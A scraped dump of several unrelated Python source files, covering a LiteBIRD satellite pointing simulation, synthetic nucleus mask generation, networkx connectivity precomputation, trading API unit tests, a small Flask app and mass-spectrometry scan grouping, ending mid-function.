\"nominal\", \"mirror\", \"radial\"' )\n parser.add_argument( '--wafersize', required=False, default=86.6, help='Wafer width in millimeters' )\n parser.add_argument( '--waferang', required=False, default=3.0, help='Angular size (in degrees) of wafer' )\n parser.add_argument( '--outdir', required=False, default='.', help='Output directory' )\n parser.add_argument( '--debug', required=False, default=False, action='store_true', help='Write focalplane image and other diagnostics' )\n parser.add_argument( '--shiftx', required=False, default=0., help='how much shifting of the detector on the focal plane in the x direction' )\n parser.add_argument( '--shifty', required=False, default=0., help='how much shifting of the detector on the focal plane in the y direction' )\n args = parser.parse_args()\n\n nside = int(args.nside)\n npix = 12 * nside * nside\n\n samplerate = float(args.samplerate)\n spinperiod = float(args.spinperiod)\n spinangle = float(args.spinangle)\n precperiod = float(args.precperiod)\n precangle = float(args.precangle)\n\n wafer_mm = float(args.wafersize)\n wafer_deg = float(args.waferang)\n\n hwprate = float(args.hwprpm)\n hwpstep = None\n if args.hwpstep is not None:\n hwpstep = float(args.hwpstep)\n hwpsteptime = float(args.hwpsteptime)\n\n start = lbtime()\n fp = None\n freq = args.frequency\n shiftx = float(args.shiftx)\n shifty = float(args.shifty)\n\n #create a single detector, and give it a shift on the focal plane\n if args.fp == \"boreshift\":\n pol = lb.pol_angles_qu(1)\n pixels = ['L1A']\n wafers = []\n wafers.append( (lb.Wafer(pixels=pixels, pol=pol), \"{}B\".format(''), np.array([shiftx, shifty, 0.0])) )\n fp = lb.FocalPlane(wafers=wafers)\n \n elif args.fp == \"bore\":\n fp = lb.create_focalplane_bore()\n freq = allowed_freq[0]\n 
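# note: bands above 250 GHz map to the high-frequency telescope (HFT) focal plane;\n # lower bands select one of the LFT layouts according to --fp below\n 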
elif int(args.frequency) > 250:\n fp = lb.create_HFT_nominal(wafer_mm, wafer_deg, margin=8.0)\n else:\n if args.fp == \"nominal\":\n fp = lb.create_LFT_nominal(wafer_mm, wafer_deg, margin=8.0)\n elif args.fp == \"mirror\":\n fp = lb.create_LFT_mirror(wafer_mm, wafer_deg, margin=8.0)\n elif args.fp == \"radial\":\n fp = lb.create_LFT_radial(wafer_mm, wafer_deg, margin=8.0)\n else:\n raise RuntimeError(\"Unknown focalplane type \\\"{}\\\"\".format(args.fp))\n stop = lbtime()\n if rank == 0:\n print(\"Create focalplane: {:.2f} seconds\".format(stop-start))\n\n if args.outdir != '.':\n if not os.path.isdir(args.outdir):\n os.mkdir(args.outdir)\n\n if args.debug:\n if rank == 0:\n import matplotlib.pyplot as plt\n import litebird.vis as lbv\n fig = plt.figure( figsize=(36,18), dpi=100 )\n ax = fig.add_subplot(1, 1, 1)\n lbv.view_focalplane(fp, ax, freq=args.frequency)\n outfile = os.path.join(args.outdir, 'focalplane.png')\n plt.savefig(outfile)\n\n hits = np.zeros(npix)\n alps = np.zeros((npix,8))\n inpp = None\n if args.invnpp:\n inpp = np.zeros((npix, 6), dtype=np.float64)\n\n obs = 3600.0 * float(args.obs)\n gap = 3600.0 * float(args.gap)\n obssamples = int(obs * samplerate)\n gapsamples = int(gap * samplerate)\n nobs = int(args.numobs)\n simsamples = obssamples + gapsamples\n\n # compute which observations this process is responsible for\n\n startobs = 0\n stopobs = nobs\n\n if comm is not None:\n myobs = nobs // nproc\n leftover = nobs % nproc\n if ( rank < leftover ):\n myobs += 1\n startobs = rank * myobs\n else:\n startobs = ((myobs + 1) * leftover) + (myobs * (rank - leftover))\n stopobs = startobs + myobs\n if myobs == 0:\n print(\"WARNING: process {} assigned no data and will be idle\".format(rank))\n\n # Assume that we constantly slew the precession axis at one\n # degree per day, regardless of whether we are in a science\n # observation or a cooler cycle.\n\n # this is the increment per sample\n angincr = (np.pi / 180.0) / (24.0 * 3600.0 * samplerate)\n\n # this is the increment per complete observation\n obincr = angincr * simsamples\n\n if comm is not None:\n comm.barrier()\n start = lbtime()\n\n elapsed_bore = 0\n elapsed_sim = 0\n\n for ob in range(nobs):\n\n if (ob < startobs) or (ob >= stopobs):\n continue\n\n start_bore = lbtime()\n # Compute the time-varying quaternions representing the rotation\n # from the coordinate frame to the precession axis frame. 
The\n # angle of rotation is fixed (PI/2), but the axis starts at the Y\n # coordinate axis and sweeps.\n\n # angle about coordinate z-axis\n satang = np.arange(simsamples, dtype=np.float64)\n satang *= angincr\n satang += ob * obincr + (np.pi / 2)\n\n # this is the time-varying rotation axis\n # sataxis = [cos(ft+pi/2), sin(ft+pi/2), 0]\n cang = np.cos(satang)\n sang = np.sin(satang)\n sataxis = np.concatenate((cang.reshape(-1,1), sang.reshape(-1,1), np.zeros((simsamples,1))), axis=1)\n\n # now construct the axis-angle quaternion\n # the rotation about the axis is always pi/2 (in order to change z->x at t=0)\n # satquat = (sataxis, pi/2)\n csatrot = np.cos(0.25 * np.pi)\n ssatrot = np.sin(0.25 * np.pi)\n sataxis = np.multiply(np.repeat(ssatrot, simsamples).reshape(-1,1), sataxis)\n satquat = np.concatenate((sataxis, np.repeat(csatrot, simsamples).reshape(-1,1)), axis=1)\n\n #borequats = lb.boresight_sim(nsim=simsamples, qprec=satquat, samplerate=samplerate, spinperiod=spinperiod, spinangle=spinangle, precperiod=precperiod, precangle=precangle)\n borequats = boresight_sim(nsim=simsamples, qprec=satquat, samplerate=samplerate, spinperiod=spinperiod, spinangle=spinangle, precperiod=precperiod, precangle=precangle)\n\n stop_bore = lbtime()\n elapsed_bore += stop_bore - start_bore\n\n start_sim = lbtime()\n\n hwpang = lb.hwp_angles(0, simsamples, samplerate, hwprate, hwpstep, hwpsteptime)\n\n #lb.simulate(fp, args.frequency, borequats, hwpang, hits, inpp=inpp)\n sim2(fp, args.frequency, borequats, hwpang, hits, alps, inpp=inpp, outdir = args.outdir)\n \n stop_sim = lbtime()\n elapsed_sim += stop_sim - start_sim\n \n\n min_bore = np.zeros(1)\n max_bore = np.zeros(1)\n min_sim = np.zeros(1)\n max_sim = np.zeros(1)\n\n if comm is not None:\n comm.barrier()\n comm.Reduce(np.array(float(elapsed_bore)), min_bore, op=MPI.MIN, root=0)\n comm.Reduce(np.array(float(elapsed_bore)), max_bore, op=MPI.MAX, root=0)\n comm.Reduce(np.array(float(elapsed_sim)), min_sim, op=MPI.MIN, root=0)\n comm.Reduce(np.array(float(elapsed_sim)), max_sim, op=MPI.MAX, root=0)\n else:\n min_bore[0] = elapsed_bore\n max_bore[0] = elapsed_bore\n min_sim[0] = elapsed_sim\n max_sim[0] = elapsed_sim\n\n stop = lbtime()\n\n if rank == 0:\n print(\"Parallel Simulation: {:.2f} seconds\".format(stop-start))\n print(\" Boresight calculation: min = {:.2f} s, max = {:.2f} s\".format(min_bore[0], max_bore[0]))\n print(\" Detector pointing and accumulate: min = {:.2f} s, max = {:.2f} s\".format(min_sim[0], max_sim[0]))\n\n start = lbtime()\n\n fullhits = None\n fullinpp = None\n\n if comm is not None:\n if rank == 0:\n fullhits = np.zeros(npix, dtype=np.float64)\n if inpp is not None:\n fullinpp = np.zeros((npix, 6), dtype=np.float64)\n\n comm.Reduce(hits, fullhits, op=MPI.SUM, root=0)\n if inpp is not None:\n comm.Reduce(inpp, fullinpp, op=MPI.SUM, root=0)\n else:\n fullhits = hits\n fullinpp = inpp\n\n stop = lbtime()\n if rank == 0:\n print(\"Reduction: {:.2f} seconds\".format(stop-start))\n\n\n start = lbtime()\n\n if rank == 0:\n\n #outfile = os.path.join(args.outdir, 'hits.fits')\n #hp.fitsfunc.write_map(outfile,hits)\n outfile = os.path.join(args.outdir, 'hits.bin')\n with open(outfile, 'wb') as f:\n fullhits.tofile(f)\n\n if fullinpp is not None:\n outfile = os.path.join(args.outdir, 'invnpp.bin')\n with open(outfile, 'wb') as f:\n fullinpp.tofile(f)\n\n stop = lbtime()\n if rank == 0:\n print(\"Write hits and N_pp^-1: {:.2f} seconds\".format(stop-start))\n\n if comm is not None:\n comm.barrier()\n global_stop = lbtime()\n if rank 
== 0:\n print(\"Total Time: {:.2f} seconds\".format(global_stop-global_start))\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"hungiyang/litebird","sub_path":"litebird_tod/create_pointing.py","file_name":"create_pointing.py","file_ext":"py","file_size_in_byte":16019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73635400164","text":"import math, random\nimport numpy as np\nfrom PIL import Image, ImageDraw\nfrom scipy import ndimage\nfrom tqdm import tqdm\nfrom skimage.filters import gaussian\nfrom scipy.stats import beta\nfrom bayes_opt import BayesianOptimization\nfrom scipy.ndimage import distance_transform_cdt\n\n\nclass OVERLAP_AREA:\n def __init__(self, mask):\n self.mask=mask\n self.distance_map = self.get_distance_map()\n self.state_dict = None\n self.label = 1\n \n def set_param(self, **kwargs):\n self.state_dict = kwargs\n self.mask[self.state_dict['x'], self.state_dict['y']] = 0\n self.distance_map = self.get_distance_map()\n \n def __call__(self, ecc, angle):\n ellps = draw_polygon(ecc=ecc, angle=angle, s=self.mask.shape[0], **self.state_dict)\n# ellps = draw_ellipse(center=self.center,\n# a=a,\n# b=b,\n# angle=angle,\n# mask_shape=self.mask.shape,\n# )\n ellps = ellps.astype(bool)\n mask = self.mask>0\n return -(ellps&mask).sum()/(self.distance_map[ellps].sum()/10+1e-6)\n \n def draw(self, ecc, angle):\n ellps = draw_polygon(ecc=ecc, angle=angle, s=self.mask.shape[0], **self.state_dict)\n self.mask[ellps.astype(bool)] = self.label\n self.distance_map = self.get_distance_map()\n self.label += 1\n \n def get_mask(self):\n return self.mask\n \n def get_distance_map(self):\n return distance_transform_cdt(~(self.mask>0))\n\n \ndef random_polygon_params():\n area, irr, spike, nverti = get_rand_polygon_param(nsize, **kwargs);\n\ndef generate_fake_mask_from_points(points, nsize, var_x=0, var_y=0, ntry_max=30, **kwargs):\n bin_mask = np.zeros((nsize,nsize))\n color_mask = np.zeros((nsize,nsize))\n\n density = np.zeros((nsize, nsize), dtype=np.uint8)\n for c_row, c_col in points:\n density[int(c_row), int(c_col)] = 255\n ov = OVERLAP_AREA(density)\n density = gaussian(density, 20)\n \n with tqdm(total=len(points)) as pbar:\n for nuclei_no, (x, y) in enumerate(points):\n mu_Area = 1000*np.exp(-1000*np.array(density[x, y]))+100\n var_Area = 1700000*np.exp(-2800*np.array(density[x, y]))+100\n max_Area = 8000*np.exp(-1300*np.array(density[x, y]))+200\n area, irr, spike, nverti = get_rand_polygon_param(mu_Area=mu_Area, sigma_Area=var_Area, max_Area = max_Area,)\n \n ov.set_param(x=x, y=y, area=area, irr=irr, spike=spike, nverti=nverti)\n# ecc = np.random.rand()\n# angle = random.uniform(0, 2*math.pi)\n \n pbounds = {'ecc':[0.5,1], 'angle':[0,180]}\n optimizer = BayesianOptimization(\n f=ov,\n pbounds=pbounds,\n verbose=0,\n random_state=nuclei_no,\n )\n optimizer.maximize(\n init_points=1,\n n_iter=ntry_max,\n )\n ov.draw(**optimizer.max['params'])\n# ov.draw(ecc, angle)\n \n \n \n# overlap = np.sum((im_add*bin_mask)>0) / (np.sum(im_add>0).astype(np.float32))\n# ntry = 0\n# while (overlap>0.05) and (ntry0) / (np.sum(im_add>0).astype(np.float32))\n# ntry += 1\n# color_mask[im_add.astype(bool)] = nuclei_no+1\n# bin_mask[im_add.astype(bool)] = 1\n# # contour += con_add\n pbar.update(1)\n return ov\n\n\ndef generate_fake_mask_from_points_old(points, nsize, ntry_max = 50, **kwargs):\n bin_mask = np.zeros((nsize,nsize,3))\n color_mask = np.zeros((nsize,nsize,3))\n contour = np.zeros((nsize,nsize,3))\n with 
tqdm(total=len(points)) as pbar:\n        for nuclei_no, (x, y) in enumerate(points):\n            im_add, con_add = rand_nucleus(x=x, y=y, nsize = nsize, **kwargs)\n            overlap = np.sum((im_add*bin_mask)>0) / (np.sum(im_add>0).astype(np.float32))\n            ntry = 0\n            # NOTE: retry-loop body reconstructed; the original span between '<' and the next '>' was lost to markup stripping\n            while (overlap>0.05) and (ntry < ntry_max):\n                im_add, con_add = rand_nucleus(x=x, y=y, nsize = nsize, **kwargs)\n                overlap = np.sum((im_add*bin_mask)>0) / (np.sum(im_add>0).astype(np.float32))\n                ntry += 1\n            color_mask += im_add * np.random.rand(3)[None,None]\n            bin_mask += im_add\n            contour += con_add\n            pbar.update(1)\n    return color_mask, bin_mask, contour\n\n\ndef get_rand_polygon_param(mu_Area=600, sigma_Area=400, max_Area = 500,\n                     mu_irr=0.6, sigma_irr=2.0, \n                     mu_spike=0.04, sigma_spike=0.005, \n                     mu_nverti=20, sigma_nverti=8):\n    beta_mean = mu_Area/max_Area\n    beta_var = sigma_Area/max_Area**2\n    beta_a = beta_mean**2*(1-beta_mean)/beta_var-beta_mean\n    beta_b = beta_mean*(1-beta_mean)**2/beta_var-1+beta_mean\n    if beta_a < 0 or beta_b < 0:\n        import pdb\n        pdb.set_trace()\n    area = beta.rvs(beta_a, beta_b)*max_Area;\n    irr = mu_irr+random.random()*sigma_irr;\n    spike = mu_spike+random.random()*sigma_spike;\n    nverti = int(random.random()*sigma_nverti+mu_nverti);\n    return area, irr, spike, nverti;\n\n\ndef draw_polygon(x=None, y=None, area=None, ecc=None, \n                 irr=None, spike=None, nverti=None, s=None, angle=None):\n    angle = angle/180.0*math.pi\n    vertices = generatePolygon(x, y, area, ecc, irr, spike, nverti, angle);\n    mask = Image.fromarray(np.zeros((s, s), dtype=np.uint8));\n    draw = ImageDraw.Draw(mask);\n    draw.polygon(vertices, fill=1);\n    return np.array(mask);\n\ndef rand_nucleus(x, y, ecc=0, angle=0, nsize = 460, **kwargs):\n    area, irr, spike, nverti = get_rand_polygon_param(nsize, **kwargs);\n    mask = draw_polygon(x, y, area, ecc, irr, spike, nverti, nsize, angle);\n    return mask\n\n\ndef generatePolygon(ctrX, ctrY, Area, eccentricity, irregularity, spikeyness, numVerts, angle):\n    irregularity = clip( irregularity, 0,1 ) * 2*math.pi / numVerts\n    eccentricity = clip(eccentricity, 0, 1)\n    semi_minor = math.sqrt(Area*math.sqrt(1-eccentricity**2)/math.pi)\n\n    # generate n angle steps\n    angleSteps = []\n    lower = (2*math.pi / numVerts) - irregularity\n    upper = (2*math.pi / numVerts) + irregularity\n    angle_sum = 0\n    for i in range(numVerts):\n        tmp = random.uniform(lower, upper)\n        angleSteps.append( tmp )\n        angle_sum = angle_sum + tmp\n    \n    # normalize the steps so that point 0 and point n+1 are the same\n    k = angle_sum / (2*math.pi)\n    for i in range(numVerts):\n        angleSteps[i] = angleSteps[i] / k\n    \n    points = []\n#     angle = random.uniform(0, 2*math.pi)\n    init_angle = angle\n\n    for i in range(numVerts):\n        r_i = semi_minor//(math.sqrt(1-(eccentricity*math.cos(angle))**2)+1e-6)\n        tmp_spikeyness = clip(spikeyness, 0, 1) * r_i\n        r_i = clip(random.gauss(r_i, tmp_spikeyness), 0, 2*semi_minor)\n        x = ctrX + r_i*math.cos(angle-init_angle)\n        y = ctrY + r_i*math.sin(angle-init_angle)\n        points.append((int(x), int(y)))\n\n        angle = angle + angleSteps[i]\n    \n    return points\n    \n\n\ndef clip(x, min, max):\n    if( min > max ): return x\n    elif( x < min ): return min\n    elif( x > max ): return max\n    else: return x\n","repo_name":"CJLee94/Points2Image","sub_path":"polygon_v2.py","file_name":"polygon_v2.py","file_ext":"py","file_size_in_byte":7710,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
+{"seq_id":"71826840484","text":"# calling list\ndata = [\"antonio\", 2, \"sebastian\"]\nprint(data[1])\n\nfriends = [[\"diana\", 24], [\"jack\", 28], [\"liza\", 30]]\nprint(friends[0][0])\n\n\n# adding value at the last in list\nnumber = [1, 2, 
3]\nnumber.append(4)\nnumber.remove(2)\nprint(number)\n\n\n# adding value in some index list\ndata = [1, 3, 4]\ntemp = data[:]\nprint(temp)\ntemp[1:1] = [2]\nprint(temp)\n\n\n# calling key in json list\njson ={\n \"sudent\": \"aziz\",\n \"class\": \"kelas-i\"\n}\n\ntemp = []\n\nfor k,v in json.items():\n temp.append(k)\n\nprint(temp[1])\n","repo_name":"aziz-alqudsy/basic-python","sub_path":"lists.py","file_name":"lists.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37937754462","text":"import networkx as nx\nimport json\nimport os\n\ndef main():\n done = ['dfn_58.graphml', 'colt_153.graphml', 'gts_ce_149.graphml', 'intellifiber_73.graphml', 'triangle.graphml']\n networks = ['abilene_11.graphml']\n\n for net_file in networks:\n node_connectivity = {}\n edge_connectivity = {}\n graphml_network = nx.read_graphml(net_file, node_type=int)\n for u in graphml_network.nodes():\n u_id = f'pop{u}'\n node_connectivity[u_id] = {}\n edge_connectivity[u_id] = {}\n for v in graphml_network.nodes():\n v_id = f'pop{v}'\n if u_id != v_id:\n node_connectivity[u_id][v_id] = nx.node_connectivity(graphml_network, s=u, t=v)\n edge_connectivity[u_id][v_id] = nx.edge_connectivity(graphml_network, s=u, t=v)\n\n os.makedirs('connectivity/', exist_ok=True)\n with open(f'connectivity/{net_file}_node_con.json', 'w') as fp:\n json.dump(node_connectivity, fp)\n with open(f'connectivity/{net_file}_edge_con.json', 'w') as fp:\n json.dump(edge_connectivity, fp)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"CN-UPB/distributed-coordination","sub_path":"params/networks/precompute.py","file_name":"precompute.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"52"} +{"seq_id":"12333966014","text":"from trading_ig.rest import IGService\nimport responses\nimport json\nimport pandas as pd\nfrom datetime import datetime, timedelta\nimport re\n\n\nclass TestActivities:\n\n \"\"\"\n unit tests for activities\n \"\"\"\n\n @responses.activate\n def test_activities_by_period(self):\n\n # test_activities_by_period\n\n with open('tests/data/activities_v1.json', 'r') as file:\n response_body = json.loads(file.read())\n\n responses.add(responses.GET,\n re.compile('https://demo-api.ig.com/gateway/deal/history/activity/.+'),\n match_querystring=False,\n headers={'CST': 'abc123', 'X-SECURITY-TOKEN': 'xyz987'},\n json=response_body,\n status=200)\n\n ig_service = IGService('username', 'password', 'api_key', 'DEMO')\n result = ig_service.fetch_account_activity_by_period(10000000)\n\n # we expect a pd.DataFrame with 17 columns and 3 rows\n assert isinstance(result, pd.DataFrame)\n assert result.shape[0] == 3\n assert result.shape[1] == 17\n\n @responses.activate\n def test_activities_by_date(self):\n\n # fetch_account_activity_by_date\n\n with open('tests/data/activities_v1.json', 'r') as file:\n response_body = json.loads(file.read())\n\n url = \"https://demo-api.ig.com/gateway/deal/\"\n date_pat = '[0-9]{2}-[0-9]{2}-[0-9]{4}' # NOT a very god regexp for dates will suffice here\n\n responses.add(responses.GET,\n re.compile(f\"{url}history/activity/{date_pat}/{date_pat}\"),\n match_querystring=False,\n headers={'CST': 'abc123', 'X-SECURITY-TOKEN': 'xyz987'},\n json=response_body,\n status=200)\n\n ig_service = IGService('username', 'password', 'api_key', 'DEMO')\n to_date = datetime.now()\n from_date = to_date - timedelta(days=7)\n result = 
ig_service.fetch_account_activity_by_date(from_date, to_date)\n\n # we expect a pd.DataFrame with 17 columns and 3 rows\n assert isinstance(result, pd.DataFrame)\n assert result.shape[0] == 3\n assert result.shape[1] == 17\n\n\n","repo_name":"ElijahAhianyo/ig-markets-api-python-library","sub_path":"tests/test_activities.py","file_name":"test_activities.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"70897780004","text":"from flask import Flask, render_template, request\nfrom listAssignments import convert\n\napp = Flask(__name__)\n\n@app.route('/')\ndef template():\n return render_template('index.html')\n\n@app.route('/', methods=['POST'])\ndef output():\n input = request.form['input']\n addons = request.form['addons']\n input = input.split('\\n')\n processed_text = convert(input, addons)\n processed_text = processed_text.split('\\n')\n return render_template('index.html', text=processed_text)","repo_name":"joliefish/list-assignments","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11093738832","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport os\nimport re\nimport warnings\nimport operator\nimport collections\nfrom typing import Sequence\nimport networkx as nx\nimport numpy as np\nimport h5py\nfrom dimspy.portals import mzml_portal\nfrom dimspy.portals import hdf5_portal\nfrom dimspy.portals import thermo_raw_portal\nfrom dimspy.process.replicate_processing import average_replicate_scans\nfrom dimspy.models.peaklist import PeakList\nfrom dimspy.process.peak_filters import filter_attr\nfrom dimspy.process.peak_filters import filter_ringing\nfrom dimspy.process.peak_filters import filter_mz_ranges\nfrom .filters import validate_injection_time_ms1, filter_by_replicates, filter_by_isolation\n\n\ndef hdf5_peaklists_to_txt(filename: str, path_out: str, delimiter:str = \"\\t\"):\n\n \"\"\"\n\n :param filename:\n :param path_out:\n :param delimiter:\n \"\"\"\n\n if not os.path.isfile(filename):\n raise IOError('HDF5 database [%s] does not exist' % filename)\n if not h5py.is_hdf5(filename):\n raise IOError('input file [%s] is not a valid HDF5 database' % filename)\n\n if not os.path.isdir(path_out):\n raise IOError(\"File or Directory does not exist:\".format(path_out))\n\n obj = hdf5_portal.load_peaklists_from_hdf5(filename)\n if \"#\" in obj[0].ID:\n fns = set([pl.ID.split(\"#\")[0] for pl in obj])\n sub_ids = [pl.ID.split(\"#\")[1] for pl in obj]\n for fn in fns:\n with open(os.path.join(path_out, os.path.splitext(fn)[0] + \".txt\"), \"w\") as pk_out:\n for i, pl in enumerate(obj):\n if fn in pl.ID:\n pl.add_attribute(\"event\", pl.full_shape[0] * [sub_ids[i]], flagged_only=False, on_index=3)\n str_out = pl.to_str(delimiter=delimiter)\n if i > 0:\n pk_out.write(str_out[str_out.index('\\n'):])\n else:\n pk_out.write(str_out)\n pl.drop_attribute(\"event\")\n else:\n for pl in obj:\n with open(os.path.join(path_out, os.path.splitext(pl.ID)[0] + \".txt\"), \"w\") as pk_out:\n pk_out.write(pl.to_str(delimiter=delimiter))\n return\n\n\ndef mz_tolerance(mz: float, tol: float, unit: str = \"ppm\"):\n\n \"\"\"\n\n :param mz: mz value\n :param tol: tolerance\n :param unit: ppm or da\n :return:\n :rtype: float\n \"\"\"\n\n if unit.lower() == \"ppm\":\n return mz * (1 - (float(tol) * 0.000001)), mz * (1 + (float(tol) * 0.000001))\n elif unit.lower() == 
\"da\":\n return mz - float(tol), mz + float(tol)\n else:\n raise ValueError(\"Incorrect unit type (options: ppm or da)\")\n\n\ndef create_graphs_from_scan_ids(scan_dependents: list, scan_events: dict, ion_injection_times: dict):\n\n \"\"\"\n Create Directed Graph from scan dependent relationships\n\n :param scan_dependents:\n :param scan_events:\n :param ion_injection_times:\n :return:\n :rtype:\n \"\"\"\n\n graphs = []\n G = nx.OrderedDiGraph()\n G.add_edges_from(sorted(list(scan_dependents), key=operator.itemgetter(0, 1)))\n for subgraph in [G.subgraph(c) for c in nx.weakly_connected_components(G)]:\n\n edges = sorted(list(subgraph.edges()), key=operator.itemgetter(0, 1))\n nodes = sorted(subgraph.nodes())\n\n replicates_within, its = collections.OrderedDict(), collections.OrderedDict()\n for n in nodes:\n replicates_within.setdefault(scan_events[n], []).append(n)\n its.setdefault(scan_events[n], []).append(ion_injection_times[n])\n\n G = nx.OrderedDiGraph()\n for rw in replicates_within:\n\n scan_info = [(None, None, 0.0)]\n scan_info.extend(re.findall(r'([\\w\\.-]+)@([a-zA-Z]+)(\\d+\\.\\d+)', rw))\n\n G.add_node(rw,\n scanids=replicates_within[rw],\n mslevel=len(scan_info),\n coltype=scan_info[-1][1],\n colenergy=float(scan_info[-1][2]),\n injectiontimes=its[rw],\n flag=True)\n G.add_edges_from([(scan_events[e[0]], scan_events[e[1]]) for e in edges])\n graphs.append(G)\n\n return graphs\n\n\ndef merge_ms1_scans(graphs: list):\n\n \"\"\"\n\n :param graphs:\n :return:\n :rtype:\n \"\"\"\n\n scan_ids = collections.OrderedDict()\n for G in graphs:\n root = list(nx.topological_sort(G))[0]\n scan_ids.setdefault(root, []).extend(G.node[root][\"scanids\"])\n for G in graphs:\n root = list(nx.topological_sort(G))[0]\n G.node[root][\"scanids\"] = scan_ids[root]\n return graphs\n\n\ndef create_templates(graphs: list, nh: int):\n\n \"\"\"\n Create a 'master' graph that include all the experimental trees\n Loop through all the subgraphs/graphs\n\n :param graphs:\n :param nh:\n :return:\n :rtype:\n \"\"\"\n\n templates = []\n for G in graphs:\n # Validate if the root node represents a scan event without fragmentation\n # Check if a subgraph, with a user defined number of nodes, exist in the list of templates\n # The nodes (scan events) are matched based on the order they have been collected\n if list(G.edges())[0:nh - 1] not in [list(g.edges())[0:nh - 1] for g in templates]:\n # Create a initial template with a particular number of nodes / edges\n Gt = nx.OrderedDiGraph()\n Gt.add_edges_from(list(G.edges())[0:nh - 1])\n for n in Gt.nodes():\n scan_info = re.findall(r'([\\w\\.-]+)@([a-zA-Z]+)(\\d+\\.\\d+)', n)\n Gt.node[n][\"scanids\"] = list()\n Gt.node[n][\"mslevel\"] = len(scan_info) + 1\n if len(scan_info) == 0:\n Gt.node[n][\"coltype\"] = None\n Gt.node[n][\"colenergy\"] = None\n else:\n Gt.node[n][\"coltype\"] = scan_info[-1][1]\n Gt.node[n][\"colenergy\"] = float(scan_info[-1][2])\n Gt.node[n][\"template\"] = True\n Gt.node[n][\"flag\"] = True\n templates.append(Gt)\n return templates\n\n\ndef group_by_template(graphs: list, templates: list):\n\n \"\"\"\n\n :param graphs:\n :param templates:\n :return:\n :rtype:\n \"\"\"\n\n master_graphs = [G.copy() for G in templates]\n for G in graphs:\n for Gt in templates:\n if G.subgraph(Gt.nodes()).number_of_edges() == Gt.number_of_edges() and \\\n sorted(G.subgraph(Gt.nodes()).nodes()) == sorted(Gt.nodes()):\n\n i = templates.index(Gt)\n\n for e in G.edges():\n for j in range(0, 2):\n # update master_graphs add nodes/edges or update scanids\n if e[j] 
not in master_graphs[i].nodes():\n master_graphs[i].add_node(e[j],\n scanids=G.node[e[j]][\"scanids\"],\n mslevel=G.node[e[j]][\"mslevel\"],\n coltype=G.node[e[j]][\"coltype\"],\n colenergy=G.node[e[j]][\"colenergy\"],\n flag=G.node[e[j]][\"flag\"],\n template=False)\n else:\n for scan_id in G.node[e[j]][\"scanids\"]:\n if scan_id not in master_graphs[i].node[e[j]][\"scanids\"]:\n master_graphs[i].node[e[j]][\"scanids\"].append(scan_id)\n\n if e not in master_graphs[i].edges():\n master_graphs[i].add_edge(e[0], e[1])\n\n return master_graphs\n\n\ndef assign_precursor(peaklist: PeakList, header_frag: str, tolerance: float = 0.5):\n\n \"\"\"\n\n\n :param peaklist:\n :param header_frag:\n :param tolerance:\n :return:\n :rtype:\n \"\"\"\n\n prec_at_energy = re.findall(r'([\\w\\.-]+)@([\\w\\.-]+)', header_frag)\n subset = []\n for i, mz in enumerate(peaklist.mz):\n if mz >= float(prec_at_energy[-1][0]) - tolerance and mz <= float(prec_at_energy[-1][0]) + tolerance:\n subset.append((mz, peaklist.intensity[i]))\n\n if len(subset) > 0:\n s = sorted(subset, key=lambda x: x[1])[-1]\n return s[0], s[1]\n else:\n return None, None\n\n\ndef group_scans(filename: str, nh: int = 2, min_replicates: int = 1, report: str = None,\n max_injection_time: float = None, merge_ms1: bool = False, split: bool = False, remove: bool = True):\n\n \"\"\"\n\n :param filename:\n :param nh:\n :param min_replicates:\n :param report:\n :param max_injection_time:\n :param merge_ms1:\n :param split:\n :param remove:\n :return:\n \"\"\"\n\n if filename.lower().endswith(\".mzml\"):\n d = mzml_portal.Mzml(filename)\n elif filename.lower().endswith(\".raw\"):\n d = thermo_raw_portal.ThermoRaw(filename)\n else:\n raise IOError(\"Incorrect file format: {}\".format(os.path.basename(filename)))\n\n si = d.scan_ids()\n sd = d.scan_dependents()\n sit = d.ion_injection_times()\n\n graphs = create_graphs_from_scan_ids(sd, si, sit)\n\n for G in list(graphs):\n h = list(nx.topological_sort(G))[0]\n if G.node[h][\"mslevel\"] > 1:\n warnings.warn(\"MS1 scan missing. The following scans ids have been removed: {}\".format([G.node[n][\"scanids\"] for n in G.nodes()]))\n graphs.remove(G)\n\n if max_injection_time:\n for G in list(graphs):\n if not validate_injection_time_ms1(G, max_injection_time):\n scan_id_ms1 = G.nodes[list(nx.topological_sort(G))[0]][\"scanids\"]\n warnings.warn(\"Injection time MS1 {} > Maximum injection time for MS1. 
The following scan ids have been removed: {}\".format(scan_id_ms1, [G.node[n][\"scanids\"] for n in G.nodes()]))\n graphs.remove(G)\n\n if not split:\n templates = create_templates(graphs, nh)\n groups = group_by_template(graphs, templates)\n else:\n groups = graphs\n for G in groups: nx.set_node_attributes(G, False, 'template')\n\n for i, G in enumerate(groups):\n G.graph['id'] = i + 1\n\n if merge_ms1:\n # Merge all MS1 scans across a run/sample\n groups = merge_ms1_scans(groups)\n\n # flag attribute set to False if not pass filter\n groups = [filter_by_replicates(G, min_replicates) for G in groups]\n groups = [filter_by_isolation(G) for G in groups]\n\n if report is not None:\n\n with open(report, \"w\") as out:\n out.write(\"tree_id\\tevent\\ttemplate\\tscan_ids\\tscans\\tflag\\n\")\n\n for G in groups:\n if report is not None:\n for n in G.nodes(data=True):\n out.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(G.graph['id'],\n n[0],\n int(n[1][\"template\"]),\n n[1][\"scanids\"],\n len(n[1][\"scanids\"]),\n int(n[1][\"flag\"])))\n\n if remove:\n for G in list(groups):\n h = list(nx.topological_sort(G))[0]\n if not G.node[h][\"flag\"]:\n groups.remove(G)\n continue\n\n for n in G.nodes(data=True):\n if not n[1][\"flag\"]:\n G.remove_node(n[0])\n else:\n del n[1]['flag']\n\n if len(groups) == 0:\n 